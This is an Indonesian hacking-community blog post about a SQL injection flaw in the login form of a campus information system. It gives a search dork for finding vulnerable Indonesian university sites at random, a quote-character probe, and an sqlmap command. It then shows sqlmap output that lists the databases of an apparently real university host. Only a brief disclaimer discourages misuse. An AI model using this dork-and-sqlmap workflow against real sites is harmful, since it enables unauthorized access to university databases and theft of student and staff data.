Sisfo Kampus SQL Injection Vulnerability

 


Pada kesempatan kali ini admin akan sedikit share tentang vulnerability yang admin temukan pada salah satu CMS sisfo (System Informasi) kampus yang biasa di pakai oleh kampus-kampus yang ada di indonesia ini. Bug yang admin demuan ini merupakan jenis Bug SQL Injection Form Login yang pernah mimin jelasin juga di artikel sebelumnya.

Okee sekarang kita bahas vulnerability ini, seperti biasa yang kita butuhkan adalah dork untuk mencari random target yang rentan.

Dork


inurl:/?mnux=login "login" site:.ac.id

  • Lakuan dorking dan pilih salah satu target yang ingin di jadikan bahan percobaan
Kemudian nanti akan tampil halaman login. Bingun di mana bug SQL nya? yang pasti bukan bypass admin ya kawan-kawan, disini kita coba masukan username dan password dengan tanda kutip kemudian enter, ini berfungsi untuk melihat apakah website target rentan serangan SQL Injection atau tidak.


Kemudian akan muncuk error yang menandakan website tersebuat rentan serangan SQL Injection, Lalu bagaimana cara injectnya min? mudah sekali tutorialnya sudah saya bahas di dalam artikel sebelumnya tigal kalian baca dan pelajari saja.

Untuk cara melakukan injection pada bug sql yang terdapat pada form login bisa kalian  baca pada link di atas, dan thread ini akan saya persingkat saja. sebelumnya saya juga pernah share vulnerability ini Fans Pages FB komunitas subangxploits jika di sini kurang jelas bisa kalian coba berkunjung ke FP kami https://facebook.com/subangxploits. Okee lanjut kita buka sqlmap dan kita coba inject dengan perintah seperti di bawah ini.

Exploit


sqlmap -u targetvuln --data='POST DATA TARGET' --dbs --dbms=mysql


Tungu hingga sqlmap menyelesaikan tugasnya, dan jika berhasil akan muncul nama database website target seperti yang ada pada gambar di bawah ini.


---
[02:37:12] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[02:37:13] [INFO] fetching database names
[02:37:13] [INFO] retrieved: 'information_schema'
[02:37:13] [INFO] retrieved: 'mysql'
[02:37:13] [INFO] retrieved: 'performance_schema'
[02:37:13] [INFO] retrieved: 'simpkay'
[02:37:13] [INFO] retrieved: 'simpkay-asal'
[02:37:13] [INFO] retrieved: 'simulasisisfo'
[02:37:14] [INFO] retrieved: 'sisfopum'
[02:37:14] [INFO] retrieved: 'unismasisfo'
[02:37:14] [INFO] retrieved: '#mysql50#unismasisfo@bckup'
available databases [9]:
[*] #mysql50#unismasisfo@bckup
[*] information_schema
[*] mysql
[*] performance_schema
[*] simpkay
[*] simpkay-asal
[*] simulasisisfo
[*] sisfopum
[*] unismasisfo

[02:37:14] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 77 times
[02:37:14] [INFO] fetched data logged to text files under '/home/zidan/.local/share/sqlmap/output/sisfo193.unisma.ac.id'
[02:37:14] [WARNING] you haven't updated sqlmap for more than 103 days!!!

[*] ending @ 02:37:14 /2020-09-13/

Di sarankan tidak untuk melakukan Defacing, Leaked Database, atau hal negatif lainnya pada website-website yang rentan ini. Penulis serta komunitas subangxploits tidak bertanggung jawab atas apa yang di lakukan. Kami hanya sekedar sharing ilmu

 

Sisfo Kampus SQL Injection Vulnerability

Jasa Pembuatan Website

50 % off

Ingin membuat website atau blog dengan harga murah? Dapatkan harga terbaik dari kami sekarang juga!

Dapatkan Sekarang